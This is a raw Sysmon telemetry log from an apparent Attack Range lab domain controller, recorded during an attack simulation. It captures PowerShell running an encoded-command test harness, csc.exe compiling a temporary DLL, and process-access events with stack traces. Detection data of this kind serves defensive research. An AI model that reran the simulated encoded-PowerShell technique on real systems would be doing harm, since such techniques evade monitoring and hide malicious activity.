"c:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\CSCF70D6421C7C4452682E1F3C889B29C6B.TMP"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{05ADC7E1-70F5-603D-8788-00000000AD01}9004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.cmdline" 23542300x80000000000000001698105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.599{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=851E6AF95BA40AE0936C0246D35D4E15,SHA256=6B972253005CAD240E589318FABED8205C5A258ACB7990B8292625DE5BAEE279,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F5-603D-8788-00000000AD01}9004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F5-603D-8788-00000000AD01}9004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001698099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-70F5-603D-8688-00000000AD01}83767464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F5-603D-8788-00000000AD01}9004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+297f4c00(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+297f4c00(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f80839e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7e4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7e3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+702954ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7a49de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f802ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7e6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7e6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7e6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f7e63a3(wow64) 154100x80000000000000001698097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.578{05ADC7E1-70F5-603D-8788-00000000AD01}9004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.cmdline"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop} 11241100x80000000000000001698096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.568{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.cmdline2021-03-01 22:55:49.568 11241100x80000000000000001698095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:49.568{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\cz5i0d5t\cz5i0d5t.dll2021-03-01 22:55:49.568 23542300x80000000000000001698094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.458{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=134E47EDD41CCF45E98934B21563F5E5,SHA256=8CA170C7C6E6BF302D5DFC13115BACC757A0B6A98A2A786D70345FECC4330EBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.396{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.396{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.349{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.349{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001698089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:49.324{05ADC7E1-70F5-603D-8688-00000000AD01}8376\PSHost.132591129492469988.8376.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001698088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.324{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ntnfchz2.xgh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.324{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_r2hsqjvs.5ep.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001698086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.302{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_r2hsqjvs.5ep.ps12021-03-01 22:55:49.302 23542300x80000000000000001698085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.286{05ADC7E1-70F4-603D-8488-00000000AD01}8564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.286{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001698081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001698076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.240{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\M